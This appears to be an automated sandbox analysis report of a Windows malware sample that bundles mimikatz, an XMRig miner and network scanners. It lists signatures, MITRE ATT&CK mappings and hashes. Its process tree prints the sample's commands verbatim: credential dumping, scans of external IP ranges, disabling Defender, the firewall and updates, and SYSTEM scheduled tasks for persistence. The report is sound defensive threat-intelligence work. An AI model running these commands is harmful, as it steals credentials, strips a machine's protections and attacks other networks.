Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
03-09-2024 06:51
General
-
Target
202409035553c575232a0412c910ebbe721a7c08hacktoolsicedidmimikatz.exe
-
Size
9.2MB
-
MD5
5553c575232a0412c910ebbe721a7c08
-
SHA1
e51246f7ee8c415ff8a0842d24f692682bb65f12
-
SHA256
f7a88a0c8e7eb96217103e382d3b25e7a1451c7931c66762fb27c6512751f701
-
SHA512
96744ee0861cef25791579c9ea870a7792de2e2e12e51704aeb2bcf7013d44bd5c62065cbc99b1c6e229c1bf6619f76c07e17f0a96b0c8860edf959bff5ae96a
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (20041) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 27 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 34 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 43 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 23 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\jgcitiybz\vgimut.exe"C:\Windows\TEMP\jgcitiybz\vgimut.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\202409035553c575232a0412c910ebbe721a7c08hacktoolsicedidmimikatz.exe"C:\Users\Admin\AppData\Local\Temp\202409035553c575232a0412c910ebbe721a7c08hacktoolsicedidmimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\lvtrlpnz\safngtn.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\lvtrlpnz\safngtn.exeC:\Windows\lvtrlpnz\safngtn.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\lvtrlpnz\safngtn.exeC:\Windows\lvtrlpnz\safngtn.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tgskbltgt\kmildiyui\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\tgskbltgt\kmildiyui\wpcap.exeC:\Windows\tgskbltgt\kmildiyui\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tgskbltgt\kmildiyui\gvuuacina.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tgskbltgt\kmildiyui\Scant.txt2⤵
-
C:\Windows\tgskbltgt\kmildiyui\gvuuacina.exeC:\Windows\tgskbltgt\kmildiyui\gvuuacina.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tgskbltgt\kmildiyui\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tgskbltgt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\tgskbltgt\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\tgskbltgt\Corporate\vfshost.exeC:\Windows\tgskbltgt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bbugttbay" /ru system /tr "cmd /c C:\Windows\ime\safngtn.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bbugttbay" /ru system /tr "cmd /c C:\Windows\ime\safngtn.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tvfnziryd" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lvtrlpnz\safngtn.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tvfnziryd" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lvtrlpnz\safngtn.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zuinultka" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\jgcitiybz\vgimut.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zuinultka" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\jgcitiybz\vgimut.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\tgskbltgt\umetuuign.exeC:\Windows\TEMP\tgskbltgt\umetuuign.exe -accepteula -mp 784 C:\Windows\TEMP\tgskbltgt\784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\tgskbltgt\umetuuign.exeC:\Windows\TEMP\tgskbltgt\umetuuign.exe -accepteula -mp 340 C:\Windows\TEMP\tgskbltgt\340.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tgskbltgt\umetuuign.exeC:\Windows\TEMP\tgskbltgt\umetuuign.exe -accepteula -mp 2104 C:\Windows\TEMP\tgskbltgt\2104.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tgskbltgt\umetuuign.exeC:\Windows\TEMP\tgskbltgt\umetuuign.exe -accepteula -mp 2492 C:\Windows\TEMP\tgskbltgt\2492.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tgskbltgt\umetuuign.exeC:\Windows\TEMP\tgskbltgt\umetuuign.exe -accepteula -mp 2740 C:\Windows\TEMP\tgskbltgt\2740.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tgskbltgt\umetuuign.exeC:\Windows\TEMP\tgskbltgt\umetuuign.exe -accepteula -mp 2796 C:\Windows\TEMP\tgskbltgt\2796.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tgskbltgt\umetuuign.exeC:\Windows\TEMP\tgskbltgt\umetuuign.exe -accepteula -mp 768 C:\Windows\TEMP\tgskbltgt\768.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tgskbltgt\umetuuign.exeC:\Windows\TEMP\tgskbltgt\umetuuign.exe -accepteula -mp 3760 C:\Windows\TEMP\tgskbltgt\3760.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tgskbltgt\umetuuign.exeC:\Windows\TEMP\tgskbltgt\umetuuign.exe -accepteula -mp 3856 C:\Windows\TEMP\tgskbltgt\3856.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tgskbltgt\umetuuign.exeC:\Windows\TEMP\tgskbltgt\umetuuign.exe -accepteula -mp 3924 C:\Windows\TEMP\tgskbltgt\3924.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tgskbltgt\umetuuign.exeC:\Windows\TEMP\tgskbltgt\umetuuign.exe -accepteula -mp 4016 C:\Windows\TEMP\tgskbltgt\4016.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tgskbltgt\umetuuign.exeC:\Windows\TEMP\tgskbltgt\umetuuign.exe -accepteula -mp 4192 C:\Windows\TEMP\tgskbltgt\4192.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tgskbltgt\umetuuign.exeC:\Windows\TEMP\tgskbltgt\umetuuign.exe -accepteula -mp 1100 C:\Windows\TEMP\tgskbltgt\1100.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tgskbltgt\umetuuign.exeC:\Windows\TEMP\tgskbltgt\umetuuign.exe -accepteula -mp 4912 C:\Windows\TEMP\tgskbltgt\4912.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tgskbltgt\umetuuign.exeC:\Windows\TEMP\tgskbltgt\umetuuign.exe -accepteula -mp 852 C:\Windows\TEMP\tgskbltgt\852.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tgskbltgt\umetuuign.exeC:\Windows\TEMP\tgskbltgt\umetuuign.exe -accepteula -mp 4004 C:\Windows\TEMP\tgskbltgt\4004.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tgskbltgt\umetuuign.exeC:\Windows\TEMP\tgskbltgt\umetuuign.exe -accepteula -mp 4648 C:\Windows\TEMP\tgskbltgt\4648.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\tgskbltgt\kmildiyui\scan.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\tgskbltgt\kmildiyui\vittzpklj.exevittzpklj.exe TCP 194.110.0.1 194.110.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\ditziw.exeC:\Windows\SysWOW64\ditziw.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\jgcitiybz\vgimut.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\jgcitiybz\vgimut.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\safngtn.exe1⤵
-
C:\Windows\ime\safngtn.exeC:\Windows\ime\safngtn.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\lvtrlpnz\safngtn.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\lvtrlpnz\safngtn.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
1.2MB
MD580f0fdf4656abb4ef8875d4d7ed936ef
SHA16fac7d6a57315c671c6f561017e51b2d10129d3f
SHA256d20bd1ba165e99f36e40d346cac418daaf0923915687628a691678c06e4a259c
SHA5128beb578ad3772e576dab90720ddf6b57a9de4c96d6623e95e1f42fe4b0baf11aa743e5f0ca066f097da2225833ed9255922efdbe4aed222fd06385c3c106226b
-
Filesize
4.1MB
MD5e42103bd5d8d33608c6a79c20f7140a2
SHA1f4a4d6ba34fe5c364404e7828ce03b8d4b24add4
SHA25653584bc1d8e8d625a45be69de689f47a65ee5466c7044e9a81d2b8ed9e4fc565
SHA51252b4868646d4dd67dcf6e7a0ae6b2acdb6d81b5a7852fb14fecacc89bb4eabc5d264105f156e94d9caabb8f1c559ceffd494dee5a8d88a7f934fc90e4ab968ff
-
Filesize
3.7MB
MD533eae765649c33e938a3a41b67f0c7aa
SHA188ef3f5a1e3845dd66e9b23e86716324c062cc4b
SHA2563f8e4383c562034215d70f27ca4c1867cc5752861ab7bf6dc409e882032f3dce
SHA512e07cf0b300efd01fc3f4f91464d2bc4dc2be8b83a425dac0177b34c30d2e0907a6e0ecfc33ee89091ee1528e076a205ad3f3893fbdbfe01dee8b28476765bbd5
-
Filesize
2.9MB
MD5c0e9b9f01cd9263963a13c59ff3db9d2
SHA1a38345816234c7346c03e208eec459fef78e5b44
SHA25636f9510fca687e3ed7ab13ada84a90bb97efd51d31f8bc37b1fbe7b35a791aaa
SHA51286a52be3261820b792f24a91c19cf9dbcf8c23594128a473bb536e1f6d835e44f2fbbb54a1bfaa141033628e06162d7d227e08965c5f03f0dc94d72d9aeb1fa9
-
Filesize
7.6MB
MD5bcab193d4088b218b7cc754f02cf614c
SHA1e51e65bda4c262e148bb457c1216013f9edab77f
SHA2567c60ba4048db29de629cc7c6161ffa778617af6085c4bf187714f9555e2d245b
SHA5121bf7d99809bd7fecde18b1089477deb699e47051214b44225a4b98698e7e00e61e7c54b22a5c977f7f4e89e5d385706de81273f180e7b4c376c50843dada51f3
-
Filesize
33.5MB
MD5c47952fdde7283c517e5c9b61d7bd614
SHA16293fe81e487c5b0772f258692d7b930cd3647ea
SHA25664a3951ef8b5b2cf029d598790e51378ff72d6bee2b71222d568678fe270bfb4
SHA5124428e93d44a6e9a71cb6aaca422c27bc2c2824dba3150db9a2110549d5dff208d38baa1b1bcc325f19153ec61156bf1252e211ebd51ca69b9ab0e33379e71eb9
-
Filesize
2.5MB
MD5e5302763eda40562fe1bcf8bfd6220a7
SHA197575d6f63dca94de4913ed5ebb64ac96e673c51
SHA25682570fa7a71680dedf113585f94483f7b946f8b0a174471cba442693f23329e3
SHA5127e5eb15f71a079e7994ba6a82820575bede8fb900a0250e31fc0db8eb6076ed8bd5ca06d7e3d33db48ab5ceae23d4129e6e7cf395e3e7f00fc389342b604415b
-
Filesize
20.7MB
MD52472ce4faa78ded513a1a36d26692ca8
SHA1e2536db62959d901cdf207107d15f4bd1c027535
SHA256dbe886ee0d4de172b94a4fff740cdbec8f58d5c6308538cc334c06b5c9f05bd9
SHA512d9b987af3ae8f59c97e64452d0a8d586cf0884e42495ff4e13207c81ab9854c06895aa148bbcf7d8fe9660c947fec60f510be8775cab8cb9ca3575962d97fb20
-
Filesize
4.2MB
MD562dfee01fabbdfb5a0ba67f0007209ce
SHA1f505b5f69631e24adbda923f0d3d2aae570be029
SHA25640634120bb2a607b3fe5face5db181becf469aa76547f595296f6d33959d78a9
